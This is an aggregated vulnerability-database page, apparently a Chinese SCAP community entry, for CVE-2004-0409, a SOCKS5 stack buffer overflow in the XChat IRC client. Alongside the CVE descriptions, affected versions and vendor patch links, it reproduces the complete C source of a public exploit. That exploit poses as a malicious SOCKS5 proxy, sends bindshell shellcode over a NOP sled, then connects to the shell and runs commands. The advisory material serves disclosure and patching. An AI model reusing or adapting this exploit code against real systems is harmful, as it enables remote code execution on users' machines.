CVE-2004-0409
CVSS7.5
发布时间 :2004-06-01 00:00:00
修订时间 :2016-10-17 22:45:07
NMCOES    

[原文]Stack-based buffer overflow in the Socks-5 proxy code for XChat 1.8.0 to 2.0.8, with socks5 traversal enabled, allows remote attackers to execute arbitrary code.


[CNNVD]XChat SOCKS5 远程缓冲区溢出漏洞(CNNVD-200406-024)

        
        X-chat是一款免费开放源代码的IRC客户端,可运行在Unix、Linux和Microsoft Windows平台下。
        X-chat中SOCKS 5代理实现存在问题,远程攻击者可以利用这个漏洞利用恶意代理服务器,诱使X-chat用户穿梭,而触发缓冲区溢出。
        目前没有详细漏洞细节提供。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:xchat:xchat:1.8.6XChat XChat 1.8.6
cpe:/a:xchat:xchat:1.9.5XChat XChat 1.9.5
cpe:/a:xchat:xchat:1.8.5XChat XChat 1.8.5
cpe:/a:xchat:xchat:1.9.4XChat XChat 1.9.4
cpe:/a:xchat:xchat:1.8.4XChat XChat 1.8.4
cpe:/a:xchat:xchat:1.9.3XChat XChat 1.9.3
cpe:/a:xchat:xchat:1.8.3XChat XChat 1.8.3
cpe:/a:xchat:xchat:1.9.2XChat XChat 1.9.2
cpe:/a:xchat:xchat:1.9.9XChat XChat 1.9.9
cpe:/a:xchat:xchat:1.8.9XChat XChat 1.8.9
cpe:/a:xchat:xchat:1.9.8XChat XChat 1.9.8
cpe:/a:xchat:xchat:1.8.8XChat XChat 1.8.8
cpe:/a:xchat:xchat:1.9.7XChat XChat 1.9.7
cpe:/a:xchat:xchat:1.8.7XChat XChat 1.8.7
cpe:/a:xchat:xchat:1.9.6XChat XChat 1.9.6
cpe:/a:xchat:xchat:2.0.7XChat XChat 2.0.7
cpe:/a:xchat:xchat:2.0.6XChat XChat 2.0.6
cpe:/a:xchat:xchat:2.0.8XChat XChat 2.0.8
cpe:/a:xchat:xchat:2.0.1XChat XChat 2.0.1
cpe:/a:xchat:xchat:2.0.0XChat XChat 2.0.0
cpe:/a:xchat:xchat:1.8.2XChat XChat 1.8.2
cpe:/a:xchat:xchat:1.9.1XChat XChat 1.9.1
cpe:/a:xchat:xchat:2.0.3XChat XChat 2.0.3
cpe:/a:xchat:xchat:1.8.1XChat XChat 1.8.1
cpe:/a:xchat:xchat:1.9.0XChat XChat 1.9.0
cpe:/a:xchat:xchat:2.0.2XChat XChat 2.0.2
cpe:/a:xchat:xchat:1.8.0XChat XChat 1.8.0
cpe:/a:xchat:xchat:2.0.5XChat XChat 2.0.5
cpe:/a:xchat:xchat:2.0.4XChat XChat 2.0.4

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:11312Stack-based buffer overflow in the Socks-5 proxy code for XChat 1.8.0 to 2.0.8, with socks5 traversal enabled, allows remote attackers to ex...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0409
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0409
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200406-024
(官方数据源) CNNVD

- 其它链接及资源

http://mail.nl.linux.org/xchat-announce/2004-04/msg00000.html
(VENDOR_ADVISORY)  MLIST  [xchat-announce] 20040405 xchat 2.0.x Socks5 Vulnerability
http://marc.info/?l=bugtraq&m=108258002427226&w=2
(UNKNOWN)  DEBIAN  DSA-493
http://security.gentoo.org/glsa/glsa-200404-15.xml
(UNKNOWN)  GENTOO  GLSA-200404-15
http://www.fedoralegacy.org/updates/FC2/2005-11-14-FLSA_2005_123013
(UNKNOWN)  FEDORA  FLSA:123013
http://www.redhat.com/support/errata/RHSA-2004-177.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:177
http://www.redhat.com/support/errata/RHSA-2004-585.html
(UNKNOWN)  REDHAT  RHSA-2004:585
http://www.xchat.org/
(VENDOR_ADVISORY)  CONFIRM  http://www.xchat.org/

- 漏洞信息

XChat SOCKS5 远程缓冲区溢出漏洞
高危 边界条件错误
2004-06-01 00:00:00 2005-10-20 00:00:00
远程  
        
        X-chat是一款免费开放源代码的IRC客户端,可运行在Unix、Linux和Microsoft Windows平台下。
        X-chat中SOCKS 5代理实现存在问题,远程攻击者可以利用这个漏洞利用恶意代理服务器,诱使X-chat用户穿梭,而触发缓冲区溢出。
        目前没有详细漏洞细节提供。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        
        http://www.debian.org/security/2004/dsa-493

        MandrakeSoft
        ------------
        MandrakeSoft已经为此发布了一个安全公告(MDKSA-2004:036)以及相应补丁:
        MDKSA-2004:036:Updated xchat packages fix remote vulnerability
        链接:
        http://www.linux-mandrake.com/en/security/2004/2004-036.php

        补丁下载:
        Updated Packages:
        Mandrakelinux 10.0:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/xchat-2.0.7-6.1.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/xchat-perl-2.0.7-6.1.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/xchat-python-2.0.7-6.1.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/RPMS/xchat-tcl-2.0.7-6.1.100mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/10.0/SRPMS/xchat-2.0.7-6.1.100mdk.src.rpm
        Mandrakelinux 9.2:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/xchat-2.0.4-7.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/xchat-perl-2.0.4-7.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/xchat-python-2.0.4-7.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/RPMS/xchat-tcl-2.0.4-7.1.92mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.2/SRPMS/xchat-2.0.4-7.1.92mdk.src.rpm
        Mandrakelinux 9.2/AMD64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/xchat-2.0.4-7.1.92mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/xchat-perl-2.0.4-7.1.92mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/xchat-python-2.0.4-7.1.92mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/RPMS/xchat-tcl-2.0.4-7.1.92mdk.amd64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/amd64/9.2/SRPMS/xchat-2.0.4-7.1.92mdk.src.rpm
        _______________________________________________________________________
        上述升级软件还可以在下列地址中的任意一个镜像ftp服务器上下载:
        
        http://www.mandrakesecure.net/en/ftp.php

        X-Chat
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        XChat Patch xc208-fixsocks5.diff
        
        http://www.xchat.org/files/source/2.0/patches/xc208-fixsocks5.diff

- 漏洞信息 (296)

XChat 1.8.0/2.0.8 socks5 Remote Buffer overflow Exploit (EDBID:296)
linux remote
2004-05-05 Verified
0 vade79
N/A [点击下载]
/*[ X-Chat[v1.8.0 - v2.0.8]: socks-5 remote buffer overflow exploit. ]                         *
 *                                                                                                                        *
 * by: vade79/v9 v9 fakehalo deadpig org (fakehalo/realhalo)                                   *
 *                                                                                                                        *
 * X-Chat homepage:                                                                                            *
 *  http://www.xchat.org                                                                                         *
 *                                                                                                                        *
 * compile:                                                                                                           *
 *  cc xxchat-socks5.c -o xxchat-socks5                                                                   *
 *                                                                                                                        *
 * trigger bug/workings(X-Chat socks-5 comminucation):                                           *
 *  0x05,0x00                                                                                                       *
 *  0x05,0x00,0x00,0x03                                                                                       *
 *  0x?? (the size of the following "data", 255MAX(char/int8))                                     *
 *  0x??,0x??,0x?? ... ("data")                                                                                *
 *                                                                                                                        *
 *  ie. "\x05\x00\x05\x00\x00\x03\xffxxxxxxxxxxxxxxxxxxxxxxxxxxxx..."               *
 *                                                                                                                        *
 * the "data", limited by the previous byte, is then copied into a                                 *
 * 10 byte buffer labeled buf[].  the idea is to set the size of                                     *
 * the incoming data to a larger size than expected(ie. 0xff/255MAX),                         *
 * followed by sending that amount of data to exceed the 10 byte                              *
 * buffer boundary and overwrite memory addresses(stack based).                             *
 *                                                                                                                        *
 * the problem with the size limit is that it is defined in one                                        *
 * character(char/int8), making a maximum of up to 255 bytes to be                          *
 * written to buf[].  so, this only leaves about ~100+ nops breathing                           *
 * room per offset.  another problem is that the location of the                                   *
 * shellcode depends on where/what X-Chat has already done.  those                          *
 * two things together make for a very unpractical "in the wild"                                    *
 * exploit scenario.                                                                                                *
 *                                                                                                                        *
 * i just saw several cryptic advisories about this bug, so i figured                                *
 * i would look into it and see exactly what it was.                                                      *
 *                                                                                                                        *
 * if X-Chat attempts to connect to a server(through socks-5)                                     *
 * immediately upon the start of X-Chat("autoconnect") it will make                            *
 * the shellcode location a bit easier to find.  on both source                                      *
 * compiled version 1.8.0(on rh7.1) and mandrake's rpm static binary                         *
 * version 2.0.5(on mdk9.1) an offset of 2600 worked.                                              *
 *                                                                                                                        *
 * note: the first thing that is sent to the bindshell, upon                                           *
 * successful exploitation, is "killall -9 xchat".  this will kill                                          *
 * X-Chat, but still keep the bindshell alive/active.  when searching                             *
 * for the correct offset, use increments of 100(100,200,300,...).                                *
 **********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE 255
#define BSEADDR 0xbffffffa
#define DFLPORT 1080
#define DFLSPRT 7979
#define TIMEOUT 5
static char x86_exec[]= /* bindshell(??), netric based. */
 "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66"
 "\xcd\x80\x31\xd2\x52\x66\x68\x00\x00\x43\x66\x53\x89"
 "\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89"
 "\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52"
 "\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80"
 "\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68"
 "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd"
 "\x80";
char *getcode(unsigned int);
char *socks5_bind(unsigned short,unsigned int);
void getshell(char *,unsigned short);
void printe(char *,short);
void sig_alarm(){printe("alarm/timeout hit.",1);}
int main(int argc,char **argv){
 unsigned short port=DFLPORT,sport=DFLSPRT;
 unsigned int retaddr=BSEADDR;
 char *hostptr;
 if(BUFSIZE<0||BUFSIZE>255)printe("BUFSIZE must be 1-255(char/int8).",1);
 printf("[*] X-Chat[v1.8.0-v2.0.8]: socks-5 remote buffer overflow exp"
 "loit.\n[*] by: by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n\n");
 if(argc<2){
  printf("[!] syntax: %s <offset from 0x%.8x> [port] [shell port]\n\n",
  argv[0],BSEADDR);
  exit(1);
 }
 if(argc>1)retaddr-=atoi(argv[1]);
 if(argc>2)port=atoi(argv[2]);
 if(argc>3)sport=atoi(argv[3]);
 x86_exec[20]=(sport&0xff00)>>8;
 x86_exec[21]=(sport&0x00ff);
 printf("[*] eip: 0x%.8x, socks-5 port: %u, bindshell port: %u.\n",
 retaddr,port,sport);
 hostptr=socks5_bind(port,retaddr);
 sleep(1);
 getshell(hostptr,sport);
 exit(0);
}
char *getcode(unsigned int retaddr){
 unsigned char i=0;
 char *buf;
 if(!(buf=(char *)malloc(BUFSIZE+1)))
  printe("getcode(): allocating memory failed.",1);
 memset(buf,0x90,BUFSIZE);
 for(i=0;i<64;i+=4){*(long *)&buf[i]=retaddr;}
 memcpy((buf+BUFSIZE-strlen(x86_exec)),x86_exec,strlen(x86_exec));
 return(buf);
}
char *socks5_bind(unsigned short port,unsigned int retaddr){
 int ssock=0,sock=0,so=1;
 socklen_t salen=0;
 unsigned char *buf;
 struct sockaddr_in ssa,sa;
 ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
 setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
 ssa.sin_family=AF_INET;
 ssa.sin_port=htons(port);
 ssa.sin_addr.s_addr=INADDR_ANY;
 printf("[*] awaiting connection from: *:%d.\n",port);
 if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
  printe("could not bind socket.",1);
 listen(ssock,2);
 bzero((char*)&sa,sizeof(struct sockaddr_in));
 salen=sizeof(sa);
 sock=accept(ssock,(struct sockaddr *)&sa,&salen);
 close(ssock);
 printf("[*] socks-5 server connection established.\n");
 if(!(buf=(unsigned char *)malloc(BUFSIZE+7+1)))
  printe("socks5_bind(): allocating memory failed.",1);
 memcpy(buf,"\x05\x00\x05\x00\x00\x03",6);
 buf[6]=BUFSIZE;
 memcpy(buf+7,getcode(retaddr),BUFSIZE);
 printf("[*] sending specially crafted string. (exploit)\n");
 write(sock,buf,BUFSIZE+7);
 free(buf);
 sleep(1);
 close(sock);
 printf("[*] socks-5 server connection closed.\n");
 return(inet_ntoa(sa.sin_addr));
}
void getshell(char *hostname,unsigned short port){
 int sock,r;
 fd_set fds;
 char buf[4096+1];
 struct hostent *he;
 struct sockaddr_in sa;
 printf("[*] checking to see if the exploit was successful.\n");
 if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  printe("getshell(): socket() failed.",1);
 sa.sin_family=AF_INET;
 if((sa.sin_addr.s_addr=inet_addr(hostname))){
  if(!(he=gethostbyname(hostname)))
   printe("getshell(): couldn't resolve.",1);
  memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
  sizeof(sa.sin_addr));
 }
 sa.sin_port=htons(port);
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 printf("[*] attempting to connect: %s:%d.\n",hostname,port);
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
  printf("[!] connection failed: %s:%d.\n",hostname,port);
  return;
 }
 alarm(0);
 printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
 signal(SIGINT,SIG_IGN);
 write(sock,"uname -a;id ;killall -9 xchat\n",30);
 while(1){
  FD_ZERO(&fds);
  FD_SET(0,&fds);
  FD_SET(sock,&fds);
  if(select(sock+1,&fds,0,0,0)<1)
   printe("getshell(): select() failed.",1);
  if(FD_ISSET(0,&fds)){
   if((r=read(0,buf,4096))<1)
    printe("getshell(): read() failed.",1);
   if(write(sock,buf,r)!=r)
    printe("getshell(): write() failed.",1);
  }
  if(FD_ISSET(sock,&fds)){
   if((r=read(sock,buf,4096))<1)
    exit(0);
   write(1,buf,r);
  }
 }
 close(sock);
 return;
}
void printe(char *err,short e){
 printf("[!] %s\n",err);
 if(e)exit(1);
 return;
}


// milw0rm.com [2004-05-05]
		

- 漏洞信息

5490
XChat Socks-5 Overflow
Remote / Network Access Input Manipulation, Other
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A remote overflow exists in XChat. The Socks5 proxy section of the product lacks adequate input validation providing an attack vector for a stack overflow. With a specially crafted request, an attacker can elevate permissions resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-04-19 Unknow
Unknow Unknow

- 解决方案

The vendor has released a patch to address this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Disable use of Socks5 traversal (default off) in product.

- 相关参考

- 漏洞作者

- 漏洞信息

XChat SOCKS 5 Remote Buffer Overrun Vulnerability
Boundary Condition Error 10168
Yes No
2004-04-05 12:00:00 2009-07-12 04:06:00
This issue was announced by the vendor.

- 受影响的程序版本

X-Chat X-Chat 2.0.8
X-Chat X-Chat 2.0.7
+ Mandriva Linux Mandrake 10.0
X-Chat X-Chat 2.0.6
X-Chat X-Chat 2.0.5
X-Chat X-Chat 2.0.4
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
X-Chat X-Chat 2.0.1
X-Chat X-Chat 1.8.9
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
X-Chat X-Chat 1.8.8
X-Chat X-Chat 1.8.7
+ HP Secure OS software for Linux 1.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
X-Chat X-Chat 1.8.6
X-Chat X-Chat 1.8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
X-Chat X-Chat 1.8.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
X-Chat X-Chat 1.8
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
X-Chat X-Chat 1.7.7
+ Conectiva Linux 7.0
X-Chat X-Chat 1.6.4
X-Chat X-Chat 1.6.3
+ HP Secure OS software for Linux 1.0
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
X-Chat X-Chat 1.5.6 dev
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.5 dev
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.4.3
+ Conectiva Linux 6.0
- OpenBSD OpenBSD 2.8
X-Chat X-Chat 1.4.2
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.4.1
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.4
- Debian Linux 2.2 pre potato
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.4
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
X-Chat X-Chat 1.3.13
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.3.12
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.3.11
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.3.10
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.3.9
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- Slackware Linux 7.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
X-Chat X-Chat 1.2.1
- Mandriva Linux Mandrake 7.0
RedHat xchat-1.8.11-7.i386.rpm
+ RedHat Linux 9.0 i386
Red Hat Fedora Core2
Red Hat Fedora Core1
Netwosix Netwosix Linux 1.1
Netwosix Netwosix Linux 1.0
X-Chat X-Chat 2.0.8 -r1

- 不受影响的程序版本

X-Chat X-Chat 2.0.8 -r1

- 漏洞讨论

A remotely exploitable buffer overrun was reported in XChat. This issue exists in the SOCKS 5 proxy code.

This stack-based buffer overrun could be exploited by a malicious proxy server if SOCKS 5 traversal has been enabled in the client. Successful exploitation will result in execution of arbitrary code as the client user.

It should be noted that SOCKS 5 traversal is not enabled by default and this issue only poses a risk if the victim user deliberately connects to an attacker's SOCKS 5 proxy server.

- 漏洞利用

The following proof of concept exploit has been supplied by vade79/v9 v9@fakehalo.deadpig.org.

- 解决方案

Red Hat has released an advisory (RHSA-2004:177-01) and fixes to address this issue in Red Hat Linux 9. Red Hat Linux users are advised to see the referenced advisory for further details regarding obtaining and applying appropriate fixes.

Gentoo has released updates for this issue, which may be applied with the following commands:
# emerge sync
# emerge -pv "=net-irc/xchat-1.8.11-r1"
# emerge "=net-irc/xchat-1.8.11-r1"

Debian has released advisory DSA 493-1 with patches dealing with this issue.

Mandrake has released advisory MDKSA-2004:036 as well as fixes dealing with this issue.

Netwosix has realeased an advisory (LNSA-#2004-0014) and fixes for this issue. To obtain fixed packages, users should execute the following commands:
# cd /usr/ports/graphics/xchat/
# rm nepote
# wget http://download.netwosix.org/0014/nepote
# sh nepote

The vendor has also released a source code patch.

Red Hat has released a Fedora legacy advisory (FLSA:1549) to address this issue in xchat. This advisory fixes the issue in Red Hat Linux 7.3 running on the i386 architecture. Please see the referenced advisory for more details and information about obtaining fixes.

Red Hat has released advisory RHSA-2004:297-09 and fixes to address this issue on Red Hat Linux Enterprise platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

Fedora Legacy has released security advisory FLSA:123013 addressing this issue for Fedora Core 1 and Core 2. Users are advised to see the referenced advisory for details on obtaining and applying the appropriate updates.


RedHat xchat-1.8.11-7.i386.rpm

X-Chat X-Chat 1.8.9

X-Chat X-Chat 2.0.1

X-Chat X-Chat 2.0.4

X-Chat X-Chat 2.0.5

X-Chat X-Chat 2.0.6

X-Chat X-Chat 2.0.7

X-Chat X-Chat 2.0.8

- 相关参考

 

 

关于SCAP中文社区

